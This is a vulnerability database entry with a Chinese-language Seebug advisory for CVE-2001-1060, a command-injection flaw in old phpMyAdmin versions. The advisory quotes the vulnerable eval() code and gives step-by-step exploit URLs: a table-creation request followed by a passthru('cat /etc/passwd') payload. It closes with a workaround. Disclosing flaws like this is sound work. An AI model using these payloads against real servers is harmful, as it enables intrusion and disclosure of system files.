Vulnerabilities > CVE-2001-1060 - Unspecified vulnerability in PHPmyadmin
Attack vector
UNKNOWN Attack complexity
UNKNOWN Privileges required
UNKNOWN Confidentiality impact
UNKNOWN Integrity impact
UNKNOWN Availability impact
UNKNOWN Summary
phpMyAdmin 2.2.0rc3 and earlier allows remote attackers to execute arbitrary commands by inserting them into (1) the strCopyTableOK argument in tbl_copy.php, or (2) the strRenameTableOK argument in tbl_rename.php.
Vulnerable Configurations
Seebug
bulletinFamily | exploit |
description | BugCVE: CAN-2001-1060 BUGTRAQ: 3121 phpMyAdmin中存在一个输入验证错误,允许远程攻击者执行任意命令。攻击者可能获取 敏感信息或者以httpd运行身份执行任意命令。 问题处在'tbl_copy.php' 和 'tbl_rename.php'中的下列代码中: tbl_copy.php: eval( \$message = \ $strCopyTableOK\ ; ); tbl_rename.php: eval( \$message = \ $strRenameTableOK\ ; ); 如果用户可以控制$strCopyTableOK 或 $strRenameTableOK的内容,就可能利用eval() 执行任意代码。但是直接利用: http://victim/phpmyadmin/tbl_copy.php?strCopyTableOK= .passthru('cat%20/etc/passwd'). 这样的URL并不能真正执行cat命令。这是因为在执行eval()函数之前,phpMyAdmin会检查 mysql请求是否正常返回,如果没有正常返回,程序会终止。因此,攻击者必须首先要有一个 允许创建表的数据库。攻击者可以使用下列URL来在 test 库中创建一个表(haxor): http://victim/phpmyadmin/tbl_create.php?db=test&table=haxor&query=dummy+integer+ primary+key+auto_increment&submit=1 这样攻击者就可以进行真正的攻击了: http://victim/phpmyadmin/tbl_copy.php?db=test&table=haxor&new_name=test.haxor2& strCopyTableOK= .passthru('cat%20/etc/passwd'). 2.0-2.2rc3 临时解决方法: 在'tbl_copy.php' 和 'tbl_rename.php'中的问题行(包含eval函数的行)前面加 ‘#’来注释调问题行。 厂商补丁: 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商 的主页以获取最新版本: <a href=http://www.phpwizard.net/projects/phpMyAdmin/ target=_blank>http://www.phpwizard.net/projects/phpMyAdmin/</a> |
id | SSV:4332 |
last seen | 2017-11-19 |
modified | 2008-10-26 |
published | 2008-10-26 |
reporter | Root |
title | phpMyAdmin执行任意命令漏洞 |